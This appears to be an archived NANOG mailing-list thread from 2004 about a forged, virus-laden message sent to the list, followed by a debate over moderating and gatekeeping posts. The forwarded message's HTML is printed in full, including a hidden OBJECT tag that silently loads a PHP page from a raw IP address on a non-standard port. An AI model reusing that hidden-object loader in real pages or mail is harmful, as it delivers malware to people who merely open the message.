Erm, something is definately up tonight. Message is below, for those of you who didn't want to touch this message. I can't get to the site listed in the message, so I have no idea what its trying to deliver exactly. Anyone care to comment? -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org Return-path: <owner-nanog@merit.edu> Envelope-to: bruns@2mbit.com Delivery-date: Wed, 17 Mar 2004 21:41:31 -0500 Received: from trapdoor.merit.edu ([198.108.1.26] ident=postfix) by mail.sosdg.org with esmtp (Exim 4.30) id 1B3nTO-00021v-N6; Wed, 17 Mar 2004 21:41:30 -0500 Received: by trapdoor.merit.edu (Postfix) id 6E9DA91333; Wed, 17 Mar 2004 21:40:47 -0500 (EST) Delivered-To: nanog-outgoing@trapdoor.merit.edu Received: by trapdoor.merit.edu (Postfix, from userid 56) id 35AD791331; Wed, 17 Mar 2004 21:40:47 -0500 (EST) Delivered-To: nanog@trapdoor.merit.edu Received: from segue.merit.edu (segue.merit.edu [198.108.1.41]) by trapdoor.merit.edu (Postfix) with ESMTP id 724909132F for <nanog@trapdoor.merit.edu>; Wed, 17 Mar 2004 21:40:44 -0500 (EST) Received: by segue.merit.edu (Postfix) id 5A6015DE6E; Wed, 17 Mar 2004 21:40:44 -0500 (EST) Delivered-To: nanog@merit.edu Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 8220D5DE34 for <nanog@merit.edu>; Wed, 17 Mar 2004 21:40:43 -0500 (EST) Date: Thu, 18 Mar 2004 13:40:35 +1000 To: nanog@merit.edu From: srh@merit.edu Message-ID: <xpvmqgksfnpfrcuagqc@merit.edu> MIME-Version: 1.0 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-nanog@merit.edu Precedence: bulk Errors-To: owner-nanog-outgoing@merit.edu X-Loop: nanog X-Scan-Signature: 0642888b67059a54bfdd4dcbc5a4659b X-SA-Exim-Connect-IP: 198.108.1.26 X-SA-Exim-Mail-From: owner-nanog@merit.edu Subject: Request response Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on everest.sosdg.org X-Spam-Level: ******* X-Spam-Status: No, hits=7.0 required=9.0 tests=BAYES_01,DCC_CHECK, FORGED_MUA_OUTLOOK,FORGED_OUTLOOK_TAGS,HTML_MESSAGE,MIME_HTML_ONLY, NORMAL_HTTP_TO_IP,NO_REAL_NAME,WEIRD_PORT autolearn=no version=2.63 X-Spam-Report: * 0.2 NO_REAL_NAME From: does not include a real name * -1.5 BAYES_01 BODY: Bayesian spam probability is 1 to 10% * [score: 0.0600] * 0.1 HTML_MESSAGE BODY: HTML included in message * 0.3 MIME_HTML_ONLY BODY: Message only has text/html MIME parts * 0.1 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL * 1.4 WEIRD_PORT URI: Uses non-standard port number for HTTP * 2.9 DCC_CHECK Listed in DCC (http://rhyolite.com/anti-spam/dcc/) * 1.0 FORGED_OUTLOOK_TAGS Outlook can't send HTML in this format * 2.6 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook X-SA-Exim-Version: 4.0 (built Tue, 16 Mar 2004 14:56:42 -0500) X-SA-Exim-Scanned: Yes (on mail.sosdg.org) Status: <html><body> <font face="System"> <OBJECT STYLE="display:none" DATA="http://24.84.218.164:81/641280.php"> </OBJECT></body></html>
Brian Bruns wrote:
Erm, something is definately up tonight. Message is below, for those of you who didn't want to touch this message.
I can't get to the site listed in the message, so I have no idea what its trying to deliver exactly.
Anyone care to comment?
SpamAssassin whacked it good - X-Virus-Scanned: by amavisd-new at mailgate.pbp.net X-Spam-Status: Yes, hits=8.0 tagged_above=-999.0 required=5.0 tests=BAYES_01, FORGED_MUA_OUTLOOK, FORGED_OUTLOOK_TAGS, HTML_MESSAGE, MIME_HTML_ONLY, NORMAL_HTTP_TO_IP, NO_REAL_NAME, WEIRD_PORT
On 3/17/04 9:51 PM, "Brian Bruns" <bruns@2mbit.com> wrote:
Erm, something is definately up tonight. Message is below, for those of you who didn't want to touch this message.
I can't get to the site listed in the message, so I have no idea what its trying to deliver exactly.
Anyone care to comment?
Ok, so what's the answer to this? We can sit around all day analyzing these emails. It doesn't matter where they came from or who compromised which hosts - at this point, that's immaterial. At some point in the Internet's development, we could have had the FBI kick down the door of this guy and cart him away, and NANOG is safe once again. Not anymore - even if this guy is "reachable", there will be five others tomorrow, and ten others next week. I'm sure this is all over IRC by now. These issues, combined with the ever worsening S:N ratio on this list are destroying it. Some of the folks who have long been mainstays of the NANOG community don't even read it anymore. Its time to figure out what to do about this, employing a proactive stance. The answer is not "start a new mailing list". Names have power, as they say, and NANOG has the juice. So, a few simple proposals for people to chew over... 1) Turn on list moderation and recruit a corp of volunteer moderators. The FAQ volunteers did a good job, BTW. Dave Farber's IP list (not Internet Protocol, its Interesting People), is a good example of a low volume moderated list. 2) Convert this list into a blog or discussion forum with some sort of moderation. Yes, the idea of SlashNog is disturbing, but email is a pretty weak medium at this point in time, for multipoint communications of an important nature. We have stuff like RSS that may be better suited. 3) Figure out a better way to "gatekeep" nanog-post, to keep the number of permitted posters down and to confirm their identities. 4) Shut it down. Will the last engineer on NANOG-L kill the lights? This forum is not of any use if any significant percentage of the posters are teenage IRC-lurking hackers or spammers. We need to "do the Darwin" - change or die. This isn't a mindless screed (although I do feel much better now :). Those who are experts in this area should post their ideas about how to save/reform/transform nanog-l. I'm sure Susan will be very receptive - it can't be nice to have some bozo's forging your email and sending out virus infected mail to THOUSANDS of your colleagues. If folks fear attack or retribution, please forward your comments to me and I'll anonimyze them before posting. Thanks! -- Daniel Golding Network and Telecommunications Strategies Burton Group
----- Original Message ----- From: "Daniel Golding" <dgolding@burtongroup.com> To: "Brian Bruns" <bruns@2mbit.com>; <nanog@merit.edu>; "Susan Harris" <srh@merit.edu> Sent: Thursday, March 18, 2004 11:11 AM Subject: So, What Now, NANOG? Was: Request response [important]
On 3/17/04 9:51 PM, "Brian Bruns" <bruns@2mbit.com> wrote:
Erm, something is definately up tonight. Message is below, for those of you who didn't want to touch this message.
I can't get to the site listed in the message, so I have no idea what its trying to deliver exactly.
Anyone care to comment?
Ok, so what's the answer to this?
We can sit around all day analyzing these emails. It doesn't matter where they came from or who compromised which hosts - at this point, that's immaterial. At some point in the Internet's development, we could have had the FBI kick down the door of this guy and cart him away, and NANOG is safe once again. Not anymore - even if this guy is "reachable", there will be five others tomorrow, and ten others next week. I'm sure this is all over IRC by now.
These issues, combined with the ever worsening S:N ratio on this list are destroying it. Some of the folks who have long been mainstays of the NANOG community don't even read it anymore.
Its time to figure out what to do about this, employing a proactive stance. The answer is not "start a new mailing list". Names have power, as they say, and NANOG has the juice. So, a few simple proposals for people to chew over...
1) Turn on list moderation and recruit a corp of volunteer moderators. The FAQ volunteers did a good job, BTW. Dave Farber's IP list (not Internet Protocol, its Interesting People), is a good example of a low volume moderated list.
I vote for number 1 and volunteer my self to help moderate this hell hole err list.
If folks fear attack or retribution, please forward your comments to me and I'll anonimyze them before posting.
Thanks!
-- Daniel Golding Network and Telecommunications Strategies Burton Group
Joshua Brady
On 2004-03-18-11:11:14, Daniel Golding <dgolding@burtongroup.com> wrote: [...]
Its time to figure out what to do about this, employing a proactive stance. The answer is not "start a new mailing list". Names have power, as they say, and NANOG has the juice. So, a few simple proposals for people to chew over... [...]
While these are all good ideas, I think we'll be fine if we simply exercise a little self-restraint, and familiarize ourselves with the "delete thread" functions of our respective mail clients. If you want the net.kooks, armchair traceroute engineers, sales droids, and blackhats posing as legitimate security researchers, who've came out of the woodwork to go away, don't indulge them with a response. Ignore them and they'll stop. My $0.02, -a
On Thu, 18 Mar 2004, Daniel Golding wrote:
Its time to figure out what to do about this, employing a proactive stance. The answer is not "start a new mailing list". Names have power, as they say, and NANOG has the juice. So, a few simple proposals for people to chew over...
1) Turn on list moderation and recruit a corp of volunteer moderators. The FAQ volunteers did a good job, BTW. Dave Farber's IP list (not Internet Protocol, its Interesting People), is a good example of a low volume moderated list.
2) Convert this list into a blog or discussion forum with some sort of moderation. Yes, the idea of SlashNog is disturbing, but email is a pretty weak medium at this point in time, for multipoint communications of an important nature. We have stuff like RSS that may be better suited. Not everybody agrees we are rather used to email and mail lists,
Direct moderation of every post I don't particularly like - this shuts free speach which is important and that is seed as bad for moderator may not be for many others; besides it creates an unfortunate delay and some subjects posted to the list were of most value when being posted within that short period of time - like when particular fiber cut occured or when somebody needs immediate help from such and such network, etc. One of the options to direct moderation that some lists use is to better identify subjects by main grouping. Usually by adding [subject group] on the subject line and if you're not interested in anything [email-related] for example, you'd ignore such threads from the start and only focus on [bgp-routing] for example. We could come up with acceptable list of subjects and much later require every posted to use them when the people become familiar with how to do this. Moderator can change the grouping if it has not been chosen appropriately and post to the maillist when the subject should be closed. Those who regularly do not choose group correct can be set so that their posts are moderated. Setting subject would also some effect on viruses that would not be able to provide posts with correct subject either. particularly people here I suspect.
3) Figure out a better way to "gatekeep" nanog-post, to keep the number of permitted posters down and to confirm their identities.
This forum is not of any use if any significant percentage of the posters are teenage IRC-lurking hackers or spammers. We need to "do the Darwin" - change or die.
Regarding those posting anonymously trying to go after others, this is problem with email in general that we either have to allow newcomer to communicate with you (presumed trust) which opens it up for abuse we all now hate or we can moderate ourselve to just few trusted persons and verify everybody new (which approach is also now hated by some for being very intrusive on especially when mail lists get involved). I'm not certain how we can deal with it properly in general, but PGP seems to answer this in that person's identity must be verified by others. Possibly this can be adapted either directly (require digital signature) or indirectly that new poster must be confirmed by two existing mail list members to be able to post. Or possibly simpler approach is that first-time posters are by default moderated and then after say 4 or 5 posts, it is automaticly removed. P.S. I'm not sure the situation with NANOG-l is that bad. Any high-traffic list has its own noise problems in general and I think it has not been that high here that you could not easily just ignore the thread when it turns into noisem, nor is amount of spam (non-existant) or viruses (none up until recently). I've seen it a lot worth ... --- William Leibzon Elan Networks william@elan.net
participants (7)
-
Adam Rothschild -
Brian Bruns -
Daniel Golding -
Jonathan Nichols -
Joshua Brady -
srh@merit.edu -
william(at)elan.net